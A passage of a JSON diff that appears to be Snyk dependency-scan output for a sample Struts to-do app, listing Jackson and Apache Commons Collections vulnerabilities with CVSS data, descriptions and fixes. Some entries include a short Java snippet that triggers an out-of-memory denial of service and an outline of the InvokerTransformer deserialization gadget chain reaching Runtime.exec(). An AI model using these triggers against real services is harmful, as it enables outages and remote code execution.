}, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:23.673097Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:34.457712Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.548577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19361" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx9v-gmh4-mgqw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:31.715185Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:43Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.091904Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Alessio Soldano" - ], - "semver": { - "vulnerable": [ - "[,2.8.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", - "className": "UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", - "className": "ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/pull/322", - "title": "GitHub PR" - }, - { - "url": "https://issues.jboss.org/browse/JBEAP-6316", - "title": "Jira Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:01.546686Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-01-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:01.546686Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "gmethwin@github" - ], - "semver": { - "vulnerable": [ - "[2.3.0-rc1,2.7.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", - "className": "UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", - "className": "WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-core/issues/315", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:48.004490Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-08-25T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:55:48.004490Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on 